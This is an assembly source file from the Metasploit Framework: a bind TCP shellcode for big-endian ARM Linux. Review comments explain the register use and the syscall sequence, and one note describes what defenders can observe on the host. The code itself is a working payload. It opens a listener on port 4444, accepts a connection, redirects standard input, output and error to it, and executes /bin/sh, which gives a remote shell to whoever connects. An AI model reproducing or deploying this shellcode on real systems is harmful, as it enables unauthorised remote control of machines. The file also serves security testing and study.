GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/linux/armbe/single_sock_bind.s
@@
@
@ Name: single_sock_bind
@ Qualities: -
@ Authors: Balazs Bucsay <@xoreipeip>
@ License: MSF_LICENSE
@ Description:
@
@ Implementation of a Linux bind TCP shellcode for ARM BE architecture.
@
@ Assemble with:
@ armeb-buildroot-linux-uclibcgnueabi-as -mthumb single_sock_bind.s -o shellcode.o
@ Link with:
@ armeb-buildroot-linux-uclibcgnueabi-ld shellcode.o -o shellcode
@
@ Meta-Information:
@
@ meta-shortname=Linux Bind TCP
@ meta-description=Listen on a port for a connection and run a second stage
@ meta-authors=earthquake
@ meta-os=linux
@ meta-arch=armbe
@ meta-category=singles
@ meta-connection-type=bind
@ meta-name=bind_tcp
@@

@ Review notes (big-endian ARM, GNU as syntax; `@` is the comment character):
@  - Syscall convention used throughout: number in r7, arguments in
@    r0-r2, result in r0, entered with `svc`.
@  - Sequence, as the section labels below state: socket -> bind
@    (port 4444, sin_addr = 0) -> listen -> accept -> dup2 x3 ->
@    execve "//bin/sh" -> exit. Register roles: r6 = listening socket
@    fd, later the accepted client fd; r7 = syscall number, carried
@    forward with small adds between calls.
@  - For defenders: the host-observable shape is a process that opens a
@    listening TCP socket and then execs a shell whose fds 0/1/2 are the
@    accepted connection; the constant 0x0002115C (AF_INET, port 4444)
@    is the only fixed network parameter in the listing.
@  - NOTE(review): meta-category says "singles" while meta-description
@    speaks of a "second stage"; the code executes a shell directly, so
@    the description looks inherited from a staged variant.
@  - NOTE(review): the code is position dependent: `add r0, #18` in the
@    execve block assumes the exact instruction count between it and the
@    .ascii string, so inserting or removing an instruction there breaks
@    the path pointer.

.section .text
.global _start

_start:
.code 32

@ Thumb-Mode on
@ In ARM state pc reads as the address of the current instruction + 8,
@ so r6 is the address of the `.code 16` block with bit 0 set; bx to an
@ odd address switches the core to Thumb state.
add r6, pc, #1
bx r6
.code 16

@ _socket(2,1,0)
sub r2, r2, r2          @ r2 = 0 (protocol), zeroed via reg-minus-itself
add r1, r2, #1          @ r1 = 1 (SOCK_STREAM)
add r0, r2, #2          @ r0 = 2 (AF_INET)
lsl r7, r1, #8          @ r7 = 0x100
add r7, r7, #0x19       @ r7 = 0x119 = 281 (socket, per the label above)
svc 1                   @ immediate is ignored under EABI; number is in r7
mov r6, r0              @ r6 = listening socket fd

@ struct sockaddr_in as laid out in memory (16 bytes), big-endian:
@ 1 uint8_t sin_len
@ 1 sa_family_t sin_family
@ 2 in_port_t sin_port
@ 4 struct in_addr sin_addr
@ 8 char sin_zero [8]
@ 00 02 11 5C 00000000 00000000 00000000
@ 0x115C => 4444 (network byte order; on big-endian ARM no swap is needed)
@ NOTE(review): the sin_len/sin_family split above is the BSD layout; on
@ Linux sin_family is a 16-bit field, but the bytes 00 02 read as
@ AF_INET either way, so the stored struct is the same.
@ _bind()
mov r2, #2              @ r2 = 0x2
lsl r2, r2, #8          @ r2 = 0x200
add r2, r2, #0x11       @ r2 = 0x211
lsl r2, r2, #8          @ r2 = 0x21100
add r2, r2, #0x5C       @ r2 = 0x0002115C (family = 2, port = 0x115C)
sub r3, r3, r3          @ r3 = 0: sin_addr = 0.0.0.0 (INADDR_ANY)
sub r4, r4, r4          @ r4 = 0: sin_zero[0..3]
sub r5, r5, r5          @ r5 = 0: sin_zero[4..7]
mov r1, sp
stm r1!, {r2-r5}        @ store the 16-byte struct at sp; r1 advances by 16
sub r1, #0x10           @ r1 = sp again = &addr
mov r2, #16             @ r2 = sizeof(struct sockaddr_in)
add r7, r7, #1          @ r7 = 282 (bind); r0 still holds the socket fd
svc 1

@ _listen()
mov r0, r6              @ r0 = socket fd
sub r1, r1, r1          @ r1 = 0 (backlog)
add r7, r7, #2          @ r7 = 284 (listen)
svc 1

@ _accept()
mov r0, r6              @ r0 = socket fd; r1 is still 0 (addr = NULL)
sub r2, r2, r2          @ r2 = 0 (addrlen = NULL)
add r7, r7, #1          @ r7 = 285 (accept)
svc 1
mov r6, r0              @ r6 = accepted client fd

@ _dup2()
@ Redirect fds 0, 1 and 2 onto the client socket. For the first call r0
@ still holds the accepted fd returned by accept above.
sub r1, r1, r1          @ r1 = 0 (stdin)
mov r7, #63             @ r7 = 63 (dup2)
svc 1

mov r0, r6              @ r0 = client fd
add r1, r1, #1          @ r1 = 1 (stdout)
svc 1

mov r0, r6              @ r0 = client fd
add r1, r1, #1          @ r1 = 2 (stderr)
svc 1

@ NOTE(review): as rendered here the next line carries no `@`, unlike
@ the other section labels; the assembler would read it as an
@ instruction, so it is presumably a rendering artefact of the page.
_execve()
sub r2, r2, r2          @ r2 = 0 (envp = NULL)
mov r0, pc              @ in Thumb state pc reads as this address + 4
add r0, #18             @ r0 = &"//bin/sh" (the .ascii after the exit block)
@ next instruction terminates the string beneath the code "//bin/sh"
@ in case you want to say goodbye to the null character
@ str r2, [r0, #8]
str r2, [sp, #8]        @ argv[1] = NULL
str r0, [sp, #4]        @ argv[0] = path; reuses the sockaddr scratch area
add r1, sp, #4          @ r1 = argv
mov r7, #11             @ r7 = 11 (execve)
svc 1                   @ returns only on failure; falls through to exit

@ _exit()
sub r4, r4, r4
mov r0, r4              @ r0 = 0 (exit status)
mov r7, #1              @ r7 = 1 (exit)
svc 1
.ascii "//bin/sh\0"     @ explicit NUL terminator; pairs with the str variant above being left commented
@.ascii "//bin/sh"